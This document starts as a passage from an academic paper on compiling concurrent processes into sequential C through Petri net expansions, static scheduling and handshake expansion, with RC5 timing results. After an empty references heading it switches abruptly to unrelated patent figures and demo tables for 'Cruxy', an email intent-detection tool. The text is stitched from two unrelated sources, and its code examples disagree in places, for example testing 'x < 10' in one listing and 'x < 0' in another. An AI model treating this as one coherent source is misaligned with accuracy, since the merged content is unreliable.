A State Machine (SM) is a net $G = (P, T, F, m_0)$ such that $\forall t \in T : |\bullet t| = 1 = |t \bullet|$. SMs cannot model concurrency.
A Free-Choice Net (FC-net) is a net $G = (P, T, F, m_0)$ such that $\forall t_1, t_2 \in T, t_1 \neq t_2 : \bullet t_1 \cap \bullet t_2 \neq \emptyset \Rightarrow |\bullet t_1| = 1 = |\bullet t_2|$; equivalently, $\forall p_1, p_2 \in P, p_1 \neq p_2 : p_1 \bullet \cap p_2 \bullet \neq \emptyset \Rightarrow |p_1 \bullet| = 1 = |p_2 \bullet|$. Every MG and SM is a FC-net. For FC-nets, all conflicts can be decided locally.
Let $G'$ be the subnet of a net $G$ generated by a non-empty set $X \subseteq P \cup T$. $G'$ is a MG-Component of $G$ if $\bullet t \cup t \bullet \subseteq X$ for every $t \in X$, and $G'$ is a strongly connected MG.
Let $G'$ be the subnet of a net $G$ generated by a non-empty set $X \subseteq P \cup T$. $G'$ is a SM-Component of $G$ if $\bullet p \cup p \bullet \subseteq X$ for every $p \in X$, and $G'$ is a strongly connected SM.
$G$ is said to be covered by a set of MG-Components if every transition of the net belongs to some MG-Component. $G$ is said to be covered by a set of SM-Components if every place of the net belongs to some SM-Component. Hack [16] proved that a live safe FC-net can always be covered by a set of MG-Components or a set of SM-Components.
3.3. Petri net construction
In [17,18], a process algebra was developed for constructing a Petri net model from a program of communicating processes. Among other operations, the process algebra defines operators for sequential composition, choice composition, recursive composition, and parallel composition. The reader can refer to [17,18] for details. Here, we intuitively illustrate by means of examples how these operators are used to build up the Petri net intermediate representation.
Consider again the example shown in Fig. 1. The derived Petri net models for processes ping and pong are shown in Fig. 2(a) and (b), respectively, along with their initial markings. These Petri nets can be derived by mapping each leaf operation to a primitive transition. Each transition corresponding to a computation action is assigned a separate action label (e.g. b, c, d, and f in Fig. 2). For communication actions, all communication actions along the same channel are assigned the same label (e.g. c1 and c2 in Fig. 2). These primitive transitions can be mapped to a Petri net by iteratively applying the sequential, choice, and recursive composition operators on them.
Concurrent processes can be composed via parallel composition. In parallel composition, communication actions in fact form synchronization points and are joined together at their common transitions. In Petri net theory, parallel composition is essentially a Cartesian product of the two Petri net processes along common labeled actions. This is illustrated in Fig. 2(c).
Observe that once two Petri nets are composed together, all internal communications between the two nets disappear. The actual send and receive operations are eliminated. Instead, they are replaced with simple assignment statements, thus eliminating the communication overhead. Synchronization is represented by explicit partial orderings at the Petri net level. This is a key property since ordering relations across process boundaries are made explicit in the derived Petri net representation. These ordering relations can be used to statically schedule the operations at compile time, as discussed in Section 4.
4. Sequential code generation
This section describes a static scheduling procedure that works from an intermediate Petri net representation. This section is divided into two parts. We first introduce some basic notions and the concept of an expansion, which corresponds to an acyclic Petri net fragment. We then describe how sequential code can be generated from the expansions.
4.1. Expansions
Before proceeding, we need to introduce several notions.
**Definition 4.1 (Expansion).** An expansion is an acyclic Petri net with the following properties:
- There is one or more places without input transitions.
- There is one or more places without output transitions.
- There are no transitions without at least one input place or one output place.
The places without input transitions are called initial places. The places without output transitions are called cut-off places.
**Definition 4.2 (Maximal expansion).** Let $G$ be a Petri net and let $m$ be a marking of $G$. The maximal expansion of $G$ with respect to $m$, denoted $E$, is an acyclic Petri net with the following properties:
- The initial places correspond to \( m \).
- The cut-off places correspond to the set of places encountered when a cycle has been reached.
- \( E \) is transitively closed: for each \( t \in E \) or \( p \in E \), all preceding places and transitions reachable from \( m \) are also in \( E \).
\( m \) is referred to as the initial marking.
Intuitively, the maximal expansion of \( G \) with respect to a marking \( m \) corresponds to the largest unrolling of \( G \) from \( m \) before a cycle has been encountered. Consider the example shown in Fig. 3(a). The corresponding maximal expansion with \( m = (p_1, p_2) \) is shown in Fig. 3(b).
**Definition 4.3 (Cut-off markings).** Let \( G \) be a Petri net, and let \( E \) be a maximal expansion of \( G \) with respect to the initial marking \( m \). A marking \( m_c \) is said to be a cut-off marking if it is reachable from \( m \) and no transitions are enabled to fire. The set of cut-off markings is denoted by \( C(E) \).
For the example shown in Fig. 3, there are two possible cut-off markings \( m_{c_1} = (p_1', p_2') \) and \( m_{c_2} = (p_3', p_4') \), shown, respectively, in Fig. 3(c) and (d).
Our compilation procedure works by generating code from a maximal expansion segment \( E \) obtained by using the initial marking \( m_0 \) as the initial marking for the expansion. Then from each cut-off marking \( m_c \in C(E) \), a new maximal expansion segment \( E_i \) is generated using \( m_c \) as the initial marking. This iteration terminates when all cut-off markings have already been visited. The pseudocode for the overall algorithm is shown below.
```plaintext
compile (G, m0)
{
    R = {m0};
    push (m0);
    while ((m = pop()) ≠ ∅) {
        E = maximal-expansion (G, m);
        static-scheduling (E, m);
        foreach mc ∈ C(E) {
            if (mc ∉ R) {
                R = R ∪ {mc};
                push (mc);
            }
        }
    }
}
```
The static-scheduling step is applied to each expansion segment to produce the actual code.
In the example shown in Fig. 3, only two expansion segments are needed. From the initial marking \( m = (p_1, p_2) \), the only cut-off markings reachable are \( m_{c_1} = (p_1, p_2) \) and \( m_{c_2} = (p_3, p_4) \). However, from \( m = (p_3, p_4) \), the only cut-off marking reachable is \( m_c = (p_3, p_4) \) itself, as shown in Fig. 4.
However, in the example shown in Fig. 2, only one expansion segment is needed since the only cut-off marking reachable from the initial marking is the initial marking itself (i.e. $m = (p_1, p_2)$).
4.2. Properties
The expansion procedure described in Section 4.1 is guaranteed to converge since the number of possible markings in a Petri net is finite. Hence, the number of expansions or iterations is also finite. Typically, very few expansions are required.
For certain classes of Petri nets, the convergence property is even stronger. In the case of a strongly connected live safe MG, the number of expansions is exactly one. This is because in the case of a strongly connected live safe MG, the initial marking \( m_0 \) forms a minimal feedback arc set. The number of tokens along any directed cycle in the MG in the initial marking is exactly one. Thus, according to Definition 4.2, the maximal expansion of a MG \( G \) with respect to its initial marking \( m_0 \) is exactly defined as the acyclic Petri net \( E \) where both the initial places and the cut-off places correspond exactly to the places marked by \( m_0 \). Thus, the set of cut-off markings for \( E \) contains only the initial marking \( m_0 \).
In the case of a strongly connected live safe FC-net \( G \) that can be covered by a set of strongly connected live safe MG components \( G_1, \ldots, G_n \) such that the initial marking \( m_0 \) of \( G \) restricted to \( G_i \) is also a live safe initial marking for the MG component \( G_i \), the number of expansions is also exactly one. The argument follows a similar line as the argument for the MG case. That is, the initial marking \( m_0 \) corresponds to both the initial places and cut-off places if we maximally expand \( G \) with respect to \( m_0 \). Thus, convergence is guaranteed after one expansion since the set of cut-off markings contains only \( m_0 \).
4.3. Static scheduling
We believe that detailed processor-specific optimizations can only be achieved by optimizing code generators that have been highly optimized to a particular processor architecture. This is because modern processors employ very sophisticated pipelining and superscalar execution schemes that differ from processor to processor.
We take an intermediate approach. Our compilation procedure aims to produce, as intermediate output, plain C code that retains a high degree of parallelism so that the subsequent processor-specific code generation step can produce efficient executable machine code for the target processor.
Definition 4.4 (Static scheduling). Let \( E \) be an expansion segment. \( t_i \) is said to precede \( t_j \) in \( E \), denoted as \( t_i \prec t_j \), if there is a directed path from \( t_i \) to \( t_j \). Let \( \pi : T \rightarrow N \) be a schedule function that assigns a non-negative integer \( \pi(t) \in N \) to every transition \( t \) in \( E \). A schedule is said to be valid iff it satisfies the following condition: \( \forall t_i, t_j \in E, \text{ if } t_i \prec t_j, \text{ then } \pi(t_i) < \pi(t_j) \).
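Definition 4.4 can be made concrete with a small sketch (ours, not the paper's; the four-transition DAG and its adjacency encoding are assumptions): compute an ASAP schedule by longest-path levels, then check the validity condition by verifying a strict level increase along every edge, which implies it along every directed path.

```c
#include <assert.h>

#define NT 4  /* number of transitions in the expansion segment */

/* adj[i][j] = 1 iff there is an edge t_i -> t_j in the expansion DAG;
   indices are assumed to be in topological order. */
static const int adj[NT][NT] = {
    {0, 1, 1, 0},   /* t0 -> t1, t0 -> t2 */
    {0, 0, 0, 1},   /* t1 -> t3           */
    {0, 0, 0, 1},   /* t2 -> t3           */
    {0, 0, 0, 0},
};

/* ASAP schedule: pi(t) = 1 + max pi over predecessors of t (0 if none). */
void asap_schedule(int pi[NT])
{
    for (int j = 0; j < NT; j++) {
        pi[j] = 0;
        for (int i = 0; i < j; i++)
            if (adj[i][j] && pi[i] + 1 > pi[j])
                pi[j] = pi[i] + 1;
    }
}

/* Validity (Definition 4.4): every edge must go to a strictly later
   level; strictness on edges extends to all directed paths. */
int schedule_is_valid(const int pi[NT])
{
    for (int i = 0; i < NT; i++)
        for (int j = 0; j < NT; j++)
            if (adj[i][j] && pi[i] >= pi[j])
                return 0;
    return 1;
}
```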
To illustrate this process, consider the expansion segment shown in Fig. 5(a), for which a valid schedule is shown. Although this static-scheduling step is closely related to the traditional scheduling problem [19,20], we do not yet perform any detailed scheduling of instructions or any detailed resource allocation here; this is deferred to the final code generation step. However, we can make use of similar heuristics in determining a good high-level schedule. It is not the intention of this paper to discuss in detail the different possible scheduling heuristics; the interested reader can refer to [19,20] for a survey of example techniques.
Given a schedule \( \pi \), a state machine fragment \( SM_\pi \) is constructed. In contrast to the traditional scheduling problem, where typically only data-flow blocks are considered, the control-flow graph generation step is much less straightforward. This is because we can have complex concurrent conditionals where the firing of a transition is dependent on the concurrent control flow and must obey Petri net firing rules. Essentially, the control-flow graph generation step is based on a traversal of \( E \) using Petri net firing rules, but we modify the firing rules so that we proceed in accordance to the levels defined by \( \pi \). For example, the schedule shown in Fig. 5(a) will result in the state machine fragment depicted in Fig. 5(b).
In constructing the state machine fragment for the schedule, we distinguish between two types of states: anchor states and non-anchor states. They are defined as follows.
Definition 4.5 (Anchor states). Let \( E \) be an expansion with respect to an initial marking \( m_c \), let \( C(E) \) be the set of cut-off
---
\( ^1 \) Here, we do not distinguish between \( p_i \) and \( p'_i \) because they simply denote different instances of the same place.
---
Fig. 5. (a) A valid static schedule; (b) corresponding state machine (control-flow graph) fragment.
markings, \( \pi : T \rightarrow N \) be the schedule function for \( E \), \( SM_\pi \) be the corresponding state machine fragment induced by \( \pi \), and \( s_1, s_2, \ldots, s_t \) be the corresponding set of states in the state machine fragment \( SM_\pi \). A state \( s_i \) is said to be an anchor state iff \( s_i = m_c \) or \( s_i \in C(E) \). It is said to be a non-anchor state otherwise.
In Fig. 5(b), anchor states are shown pictorially in double ovals, namely states \( p_1p_2 \) and \( p_3p_4 \). Once the overall state machine has been generated, it can be syntactically translated into a plain C program for implementation. There are several ways to perform the syntactical mapping. One way is to use a switch-case structure, as shown below.
```c
enum {p1p2, p3p4} state = p1p2;

generate-program ( )
{
    for (;;) {
        switch (state) {
        case p1p2:
            state = p1p2;   /* one branch of the segment ends in cut-off p1p2 */
            ...
            state = p3p4;   /* another branch ends in cut-off p3p4 */
            break;
        case p3p4:
            ...
            state = p3p4;
            break;
        }
    }
}
```
Using this construction, each case label corresponds to an anchor state (cut-off marking), and each case body corresponds to the code generated for the associated expansion segment. Once the overall control-flow graph has been generated, it can be syntactically translated into plain C for implementation. This last code generation step can draw upon well-studied standard code optimization techniques [3].
4.4. Enhanced cut-offs
The control-flow graph generated in Section 4.1 is essentially a reachability graph for the Petri net with a modified firing rule to consider static scheduling. When traversing an expansion segment \( E \), it is possible that certain markings have already been visited when traversing earlier expansion segments. Such previously visited markings can also serve as a cut-off condition.
In particular, suppose that, when traversing the expansions, we also add the intermediate markings visited during the traversal to the set of reachable states \( R \) in the procedure compile above. Then we can define an enhanced cut-off criterion as follows:
**Definition 4.6 (Enhanced cut-off markings).** Let \( G \) be a Petri net, \( E \) be a maximal expansion of \( G \) with respect to the initial marking \( m \), and \( R \) be a set of markings already visited. A marking \( m_c \) is said to be an enhanced cut-off marking if it is reachable from \( m \), and either \( m_c \in R \) or no transitions are enabled to fire from \( m_c \). The set of enhanced cut-offs is again denoted \( C(E) \).
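As a sketch of how the enhanced criterion bounds a traversal, the toy code below (the net encoding is an assumption, and firing is deterministic here, unlike a genuine expansion with concurrency) represents safe markings as bitmasks and stops on reaching a previously visited marking or a deadlock:

```c
#include <assert.h>

#define NP  4   /* places p1..p4; bit i set = place i+1 marked (safe net) */
#define NTR 2   /* transitions */

typedef struct { unsigned pre, post; } trans_t;

/* Hypothetical net: t0: {p1,p2} -> {p3,p4}; t1: {p3,p4} -> {p1,p2}. */
static const trans_t tr[NTR] = {
    { 0x3, 0xC },
    { 0xC, 0x3 },
};

/* Fire the first enabled transition; return m unchanged on deadlock. */
static unsigned fire_one(unsigned m)
{
    for (int i = 0; i < NTR; i++)
        if ((m & tr[i].pre) == tr[i].pre)
            return (m & ~tr[i].pre) | tr[i].post;
    return m;
}

/* Count markings visited before an enhanced cut-off is hit: either a
   previously visited marking or a deadlock (Definition 4.6). */
int explore(unsigned m0)
{
    unsigned visited[1u << NP] = {0};
    unsigned m = m0;
    int n = 0;
    while (!visited[m]) {
        visited[m] = 1;
        n++;
        unsigned next = fire_one(m);
        if (next == m)   /* no transition enabled: deadlock cut-off */
            break;
        m = next;
    }
    return n;
}
```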
4.5. Benefits
The primary benefit of our compilation procedure is the avoidance of the overhead introduced by a run-time scheduler. In addition, as can be seen from the previous section, parallelism can be exploited across process boundaries. Another key benefit is the possibility of code optimization across process boundaries. Furthermore, our compilation procedure produces an ordinary C program that can be retargeted to different processors. For example, the C program below represents a possible solution to the example shown in Fig. 2(c) using our compilation procedure.
```c
enum {p1p2} state = p1p2;

generate-program ( )
{
    int x, y, z = 0;
    for (;;) {
        switch (state) {
        case p1p2:
            x = 10;
            if (x < 10)
                x = 10 - x;
            else
                x = 10 + x;
            y = x;
            z = (z + y) % 345;
            state = p1p2;
            break;
        }
    }
}
```
Once generated into this form, well-studied standard code optimization techniques (e.g. constant propagation, dead-code elimination, etc.) can be applied [3]. In this case, the program can be reduced to a program that repeats
\[
z = (z + 20) \mod 345
\]
after constant propagation.
```c
generate-program ( )
{
    int z = 0;
    for (;;) {
        z = (z + 20) % 345;
    }
}
```
Recall that this example, though simple, was originally specified as two communicating processes. Such optimizations were not possible directly at the process-level specification.
5. Compositional sequential code generation
The direct static scheduling procedure outlined in Section 4 is summarized in Fig. 6(a). In this procedure, we compose all the processes in the system directly into a single intermediate Petri net representation. We then use static scheduling to transform the Petri net into a single sequential state machine model SM for implementation. The reason for transforming down to a single state machine is that we need to eliminate all run-time preemption and scheduling. The result is that there is only one program running in the system.
The static scheduling procedure is guaranteed to converge since the number of possible markings in a Petri net is finite. Hence, the number of expansions or iterations is also finite. The intermediate Petri net representation is usually comparable in size to the initial process-based specification. However, under some circumstances, the resulting state machine (representing the control flow) may be very large, hence causing the resulting C code to become very large in size as well. This problem can occur because the resulting state machine must represent explicitly the different combinations of states that the processes can be in with respect to the static schedule.
To circumvent this problem, we describe a compositional procedure that first transforms the initial input specification with n processes, $P_1, P_2, \ldots, P_n$, into a set of k interacting Petri net components, $N_1, N_2, \ldots, N_k$, such that $k \leq n$. In the degenerate case, $k = n$, each process $P_i$ in the initial specification is mapped to a separate Petri net component $N_i$. We then apply our static scheduling method on each Petri net component to produce a corresponding state machine model. We then map the set of interacting state machines into a single C program for implementation. This is achieved by generating a *time-loop* in software that systematically steps through the interacting state machines without the need for a context-switching run-time operating system. This new design flow is depicted in Fig. 6(b). The choice of composition can be decided by the user through compiler directives. The default can be the degenerate case, in which each process is mapped to a separate Petri net component.
To facilitate communication between the interacting Petri net components, $N_1, N_2, \ldots, N_k$, we first refine the communication channels between the components using a *handshaking protocol*. The handshaking protocol is used to implement data transmission and synchronization between the components. This *handshake expansion* can be done either at the source code or at the Petri net level. Table 1 shows the code-level expansion of a possible handshaking protocol. Other handshake protocols may be used with this compositional approach.
Consider again the ping-pong example in Fig. 2. Here, we will consider the degenerate case where each process, $P_1$ and $P_2$, is mapped to its own Petri net component, $N_1$ and $N_2$, respectively. Using handshake expansion at the code level, we obtain the code in Fig. 7. Each channel is represented by a data variable as well as a handshaking variable sync used to control the channel. The sync signal indicates whether there is data on the channel: sync = 0 means no data are available, and sync = 1 means data are available. To start a receive operation, the receiver first checks if there is data on the channel by examining whether sync is high. When the data are available, it will copy the data and reset sync back to low. Similarly, the send operation will first check

Fig. 6. (a) Direct approach; (b) compositional approach.

Fig. 7. Code level expansion example.
Table 1
Code level handshake expansion
<table>
<thead>
<tr>
<th>Operation</th>
<th>Source construct</th>
<th>Expansion</th>
</tr>
</thead>
<tbody>
<tr>
<td>receive</td>
<td>x = <-a;</td>
<td>while(a_sync == 0); x = a_data; a_sync = 0;</td>
</tr>
<tr>
<td>send</td>
<td>a<- = x;</td>
<td>while(a_sync == 1); a_data = x; a_sync = 1;</td>
</tr>
</tbody>
</table>
```c
/* Process P1 (ping) after handshake expansion */
for (;;) {
    // x = <-a;
    while (a_sync == 0);
    x = a_data;
    a_sync = 0;
    if (x < 0) {
        x = 10 - x;
    } else {
        x = 10 + x;
    }
    // b<- = x;
    while (b_sync == 1);
    b_data = x;
    b_sync = 1;
}

/* Process P2 (pong) after handshake expansion */
for (;;) {
    // y = <-b;
    while (b_sync == 0);
    y = b_data;
    b_sync = 0;
    z = (z + y) % 345;
}
```
if the channel is empty (available for sending data). It will then copy the data to the channel data variable and set sync to high. Note that only one handshake control variable is needed: the sender sets the control variable and the receiver resets it.
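The one-variable handshake can be sketched as a pair of helper functions (the function wrappers are ours; the generated code inlines the waits exactly as in Table 1):

```c
#include <assert.h>

/* One channel: a data slot plus a single handshake flag.
   The sender sets sync; the receiver resets it. */
static int a_data;
static int a_sync = 0;

/* Expansion of "a<- = x": wait until the channel is free, then publish. */
void channel_send(int x)
{
    while (a_sync == 1);   /* busy-wait: channel still holds old data */
    a_data = x;
    a_sync = 1;
}

/* Expansion of "x = <-a": wait for data, consume it, release channel. */
int channel_recv(void)
{
    while (a_sync == 0);   /* busy-wait: no data available yet */
    int x = a_data;
    a_sync = 0;
    return x;
}
```

In the compiled sequential program the busy-waits never spin, because the static schedule only reaches a receive after the matching send; calling send before recv in a single thread mirrors that.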
The expanded code shown in Fig. 7 can be translated into corresponding Petri nets shown in Fig. 8. The \( \epsilon \) transitions correspond to dummy transitions. Again, this handshake expansion can be performed directly at the Petri net level. The handshaking protocol is represented as cycles in the Petri net.
After handshake expansion, each Petri net component can be scheduled into a state machine model using the static scheduling procedure. Each state machine model can then be easily translated into C code. The state machine will return control at the end of each anchor state. All the data within each state machine are kept as global data by using hierarchical renaming schemes. Therefore, there is no context switching involved when switching between different state machines. A time-loop is then used to drive these state machines: at each iteration of the time-loop, all the state machines are advanced to their next anchor state. The pseudo-code for the state machine implementation and the main time-loop is shown in Fig. 9. The explicit state machine representation acts as a built-in preemption scheme. With the help of the time-loop in the main program, the compiled-code implementation eliminates the need for run-time preemption, context switching, and scheduling, which are the major performance overheads in a multi-tasking operating system.
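The main time-loop can be sketched as follows (the step functions and state counts are placeholders, not the paper's Fig. 9): each call advances one component state machine to its next anchor state, with no run-time scheduler or context switch involved.

```c
#include <assert.h>

/* Each component keeps its state in globals (hierarchically renamed in
   the real generator), so no stack needs to be switched between them. */
static int ping_state = 0, pong_state = 0;
static int ping_steps = 0, pong_steps = 0;

void ping_step(void) { ping_state = (ping_state + 1) % 2; ping_steps++; }
void pong_step(void) { pong_state = (pong_state + 1) % 3; pong_steps++; }

/* One iteration advances every state machine one anchor state. */
void time_loop(int iterations)
{
    for (int i = 0; i < iterations; i++) {
        ping_step();
        pong_step();
    }
}
```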
It is important to emphasize again that the resulting program is merely an ordinary C program without any specific system calls to any underlying multi-tasking operating system or the need for one. Hence, it is highly portable and only relies on a conventional optimizing C compiler to produce the final implementation.
Since the resulting program is not intended for human reading, it need not necessarily be readable. One useful optimization is to use goto statements instead of function calls. That is, each state machine model is associated with a label, and instead of making function calls in the main time-loop, goto statements are used. This can result in slightly faster implementations.
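The goto variant can be sketched as follows (labels and machine bodies are placeholders): the per-machine function calls of the time-loop are replaced by jumps within a single function, saving call overhead.

```c
#include <assert.h>

static int count = 0;

/* Time-loop with goto dispatch; each labelled block stands for the code
   of one state machine up to its next anchor state. */
int run(int iterations)
{
    int i = 0;
next_cycle:
    if (i++ >= iterations)
        return count;
    goto machine1;
machine1:
    count++;            /* body of state machine 1 */
    goto machine2;
machine2:
    count++;            /* body of state machine 2 */
    goto next_cycle;
}
```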
6. Degenerate case
In the degenerate case, each process is mapped to its own Petri net component. Specifically, we consider the degenerate case where each process in the initial specification is a sequential process (i.e. no par statement used internal to a process). For example, this is the case for the ping-pong example presented in Section 2. In this class of degenerate cases, we see that the resulting Petri net component after handshake expansion is actually already a state machine [15] because each transition has only one predecessor place and one successor place. While the corresponding Petri net component is already a state machine, we still need a procedure to determine which states are anchor states and which states are non-anchor states. Although the static scheduling procedure outlined in Section 4 can perform this task, we describe in this section a simple procedure that avoids the need to perform iterative expansions.
Consider the Petri net component shown in Fig. 8(a) after handshake expansion. This corresponds to the process ping described in Section 2. Note that this is a sequential model because there is only one token flowing
through the model. Starting from the initial marking shown, we identify the maximal expansion and the corresponding set of cut-off places, as shown in Fig. 10(a). Instead of an iterative expansion and scheduling procedure, we can simply use the cut-off places directly as the anchor states. This results in the state machine model shown in Fig. 10(b), where the double circles represent the anchor states. In this example, the state \( p_1 \) can be eliminated because its only output transition is a dummy transition \( \varepsilon \). The reduced state machine model is shown in Fig. 10(c). This state machine model can be syntactically mapped to C code using a switch-case structure, as described in Section 4.
It is important to note that the size of the generated state machine (e.g. Fig. 10(b)) is directly proportional to the size of the corresponding Petri net component (e.g. Fig. 8(a)), which in turn is directly proportional to the size of the initial code description of the corresponding process. This means that the size of the resulting C program is also directly proportional to the size of the original specification. Thus, this technique scales well to large applications and avoids code explosion problems.
7. Implementation and results
The compiler techniques presented in this paper have been implemented. The compiler is implemented as a pre-processor that generates plain C [1], which can then be processed by any available optimizing C compiler for a target processor to produce the executable machine code. This results in a highly portable solution. For comparison, we also implemented a multi-tasking approach using a multi-threading library. This multi-tasking approach uses the thread library in Solaris on a Sun platform, where each process is implemented as a separate thread.
To evaluate the effectiveness of our new approach, we applied it to an example derived from the RC5 encryption algorithm that is widely used for Internet security applications [21]. RC5 is a fast symmetric block cipher that is suitable for hardware or software implementations. It provides a high degree of security, yet is exceptionally simple. A novel feature of RC5 is the heavy use of data-dependent rotations. Since a full discussion of the RC5 algorithm is beyond the scope of this paper, the interested reader is referred to [21].
The top-level view of the example is shown in Fig. 11. It consists of an encryption–decryption chain. A stream of plaintext is read via the channel \( pt \). Then the RC5 encryption algorithm is applied on it to produce a stream of ciphertext at channel \( ct \). Then the RC5 decryption algorithm is applied to the ciphertext to decode it back to plaintext again, along channel \( dt \).

Table 2
Comparing results for the RC5 encryption example on a Sun Ultra-2 running Solaris
<table>
<thead>
<tr>
<th>Size</th>
<th>Single</th>
<th>Composition</th>
<th>Threads</th>
</tr>
</thead>
<tbody>
<tr>
<td>0.5 M</td>
<td>1.1</td>
<td>1.1</td>
<td>8.8</td>
</tr>
<tr>
<td>2 M</td>
<td>2.0</td>
<td>2.2</td>
<td>34.7</td>
</tr>
<tr>
<td>8 M</td>
<td>6.1</td>
<td>6.3</td>
<td>103.5</td>
</tr>
<tr>
<td>32 M</td>
<td>21.7</td>
<td>22.8</td>
<td>554.5</td>
</tr>
<tr>
<td>72 M</td>
<td>48.2</td>
<td>51.4</td>
<td>1241.3</td>
</tr>
<tr>
<td>512 M</td>
<td>335.9</td>
<td>360.1</td>
<td>8871.3</td>
</tr>
<tr>
<td>Rate</td>
<td>1.510 MB/s</td>
<td>1.411 MB/s</td>
<td>0.058 MB/s</td>
</tr>
</tbody>
</table>
We chose this example because it contains data-dependent loops. Table 2 compares the results generated using three methods: the static-scheduling method described in Section 4, the compositional method described in Section 5, and a multi-tasking approach using the Solaris thread library. The columns are labeled Single, Composition, and Threads, respectively. For the composition-based approach, we mapped each process to its own separate Petri net component. That is, we used the degenerate case as our composition strategy. The table compares the execution times of all three approaches on different size input streams.
The first row corresponds to a 0.5 Mbyte input file, the second row corresponds to a 2 Mbyte input file, and so on, up to the largest input size of 512 Mbyte. The CPU-times are reported in seconds on a Sun Ultra-2 workstation running Solaris. The row labeled “Rate” summarizes the throughput of the three solutions in megabytes per second. Comparing CPU-times, the static-scheduling approach is comparable to the compositional approach. The Solaris thread-based implementation is much slower due to the overhead introduced by multi-tasking and context switching.
8. Conclusion
We described new static compilation techniques for generating efficient implementations of concurrent programs for embedded applications. Our approach differs from previous approaches for asynchronously communicating processes in that it does not require or generate a multi-tasking run-time operating system for execution. Instead, a plain C program is synthesized at compile time that is readily retargetable to different processors. Besides producing a solution that avoids the overheads associated with a run-time operating system, our approach also makes order relations across process boundaries explicit so that partial ordering information can be exploited for optimization. Furthermore, the generated solution is highly portable since it only requires the availability of a host C compiler to support a particular processor. To circumvent potential code explosion problems, we described a compositional method. In the degenerate case, the size of the resulting C program is directly proportional to the size of the original concurrent specification. Thus, this technique scales well to large applications and is immune to code explosion problems.
References
Further reading
A method, system, computer program, application, online service, application program interface (API), and computer program product for analyzing any email message or text, online post, online web page, social media site, or online news site to detect predefined and actionable events and intent. A method for detecting important emails or messages, and actionable emails or messages that signify intent, including questions or promises. A method for detecting past or possible future events in any online post where the event is defined a priori.
Figures 2 and 3: event definition flow (Event Definition, User Feedback, Primary Constructs, Alternate Constructs, Categorize Grammar Constructs, Extract Grammar Rules).
Figure 4: Web-based demo form to drive the API.
<table>
<thead>
<tr>
<th>Text to analyze</th>
<th>Can you send me doc? I will send mine tomorrow. I plan to buy computer. Nice to meet you</th>
</tr>
</thead>
<tbody>
<tr>
<td>Key interest phrase</td>
<td></td>
</tr>
</tbody>
</table>
**Analysis results**
<table>
<thead>
<tr>
<th>Sentence</th>
<th>Action</th>
<th>Mood</th>
<th>Sentiment</th>
<th>Subjectivity</th>
</tr>
</thead>
<tbody>
<tr>
<td>Can you send me doc?</td>
<td>question</td>
<td>indicative</td>
<td>neutral</td>
<td>objective</td>
</tr>
<tr>
<td>I will send mine tomorrow</td>
<td>promise</td>
<td>indicative</td>
<td>neutral</td>
<td>objective</td>
</tr>
<tr>
<td>I plan to buy computer</td>
<td>Purchase intent</td>
<td>indicative</td>
<td>neutral</td>
<td>objective</td>
</tr>
</tbody>
</table>
Figure 5.
Figure 7: web mail contextual plug-in architecture (Emails of Interest, User Feedback, Web Mail Contextual Plug-In, API, JSON over HTTP, Event Detection Analytics, Grammar Rules, Event Detection Logic, Web Application Platform).
Figure 8.
Figure 9:
<table>
<thead>
<tr>
<th>Surface Score</th>
<th>Conversation Score</th>
<th>Content Score</th>
<th>Action Item</th>
</tr>
</thead>
<tbody>
<tr>
<td>0</td>
<td>0</td>
<td>0</td>
<td>FYI: ○</td>
</tr>
<tr>
<td>0</td>
<td>0</td>
<td>1</td>
<td>FYI: ○</td>
</tr>
<tr>
<td>0</td>
<td>1</td>
<td>0</td>
<td>FYI: ○</td>
</tr>
<tr>
<td>0</td>
<td>1</td>
<td>1</td>
<td>Important: †</td>
</tr>
<tr>
<td>1</td>
<td>0</td>
<td>0</td>
<td>FYI: ○</td>
</tr>
<tr>
<td>1</td>
<td>0</td>
<td>1</td>
<td>Important: †</td>
</tr>
<tr>
<td>1</td>
<td>1</td>
<td>0</td>
<td>Action Item: ‡</td>
</tr>
<tr>
<td>1</td>
<td>1</td>
<td>1</td>
<td>Action Item: ‡</td>
</tr>
</tbody>
</table>
Figure 10: Outlook Toolbar
<table>
<thead>
<tr>
<th>From</th>
<th>Subject</th>
<th>Date</th>
<th>Cruxy Category</th>
</tr>
</thead>
<tbody>
<tr>
<td>John Doe</td>
<td>Can you do this?</td>
<td>01-01-2011</td>
<td>Action Item</td>
</tr>
<tr>
<td>Mary Jane</td>
<td>I will send this ....</td>
<td>04-01-2011</td>
<td>Commitment</td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th>From</th>
<th>Subject</th>
<th>Date</th>
</tr>
</thead>
<tbody>
<tr>
<td>Scott M</td>
<td>Nice to meet you</td>
<td>04-21-2011</td>
</tr>
</tbody>
</table>
Figure 11
John Smith
Jane Doe
Jane,
Since I am in town next week, our next scheduled team meeting will be this coming Monday afternoon.
Can you make it in person?
John
Figure 12
Figure 13
Figure 14
**Figure 15**
From: Cruxy Bot (bot@cruxy.com)
To: John Doe
Cc:
Subject: Cruxy analysis
Your message with action items and promises highlighted:
I will give you a call at 1:30 pm PST on Wednesday. Do you want me to call you on your cell.
Cheers, Matt
We hope we highlighted action items and promises appropriately.
Let us know your feedback at support@cruxy.com
Thanks much
Cruxy support 303.731.2122
Cruxy v0.336 Terms & Conditions Privacy Notice
Figure 16
Gmail Conversation View
<table>
<thead>
<tr>
<th>Subject</th>
<th>Date</th>
</tr>
</thead>
<tbody>
<tr>
<td>Email 1</td>
<td>01-01-2011</td>
</tr>
<tr>
<td>Email 2</td>
<td>01-02-2011</td>
</tr>
</tbody>
</table>
Hi John Doe,
Can you send tomorrow? I will send mine tomorrow.
Thanks
Mary Jane
Cruxly Gmail Contextual Plug-in
**Questions:**
- Can you send tomorrow?
**Commitments**
- I will send mine tomorrow
Figure 17
Cruxy API Tester
Enter text to analyze
I will send the proposal out end of the day. In the meantime, please send me the customer email contact.
API Response
Action Items
In the meantime, please send me the customer email contact.
Commitments
I will send the proposal out end of the day.
Figure 18
Facebook News Feed
<table>
<thead>
<tr>
<th>Mary Jane</th>
<th>Is that Wake island? Is it on PC yet?</th>
<th>01-01-2011</th>
</tr>
</thead>
<tbody>
<tr>
<td>Samuel</td>
<td>Waiting to be released</td>
<td>01-01-2011</td>
</tr>
<tr>
<td>John Doe</td>
<td>Hello</td>
<td>01-01-2011</td>
</tr>
</tbody>
</table>
Cruxly Analysis
<table>
<thead>
<tr>
<th>Buying intent</th>
</tr>
</thead>
<tbody>
<tr>
<td>Mary Jane</td>
</tr>
<tr>
<td>Samuel</td>
</tr>
</tbody>
</table>
Figure 19
Figure 20
Figure 21
METHODS AND DEVICES FOR ANALYZING TEXT
